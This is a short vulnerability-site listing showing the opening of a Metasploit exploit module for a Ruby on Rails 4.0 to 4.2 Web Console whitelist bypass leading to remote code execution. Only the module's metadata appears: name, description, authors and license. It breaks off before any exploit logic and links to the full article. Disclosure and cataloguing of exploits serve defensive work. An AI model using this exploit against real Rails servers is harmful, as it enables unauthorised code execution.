23 Mar '17, 3pm

Ruby on Rails 4.0.x / 4.1.x / 4.2.x Whitelist Bypass Code Execution

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution',
      'Description' => %q{
        This module exploits an IP whitelist bypass vulnerability in the developer
        web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also
        achieve code execution on Rails 4.2.x if the attack is launched from a
        whitelisted IP range.
      },
      'Author' => [
        'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure
        'Ben Murphy <[email protected]>', # Discovery & disclosure
        'hdm' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE...
```

Full article: https://cxsecurity.com/issue/WLB-2017030204
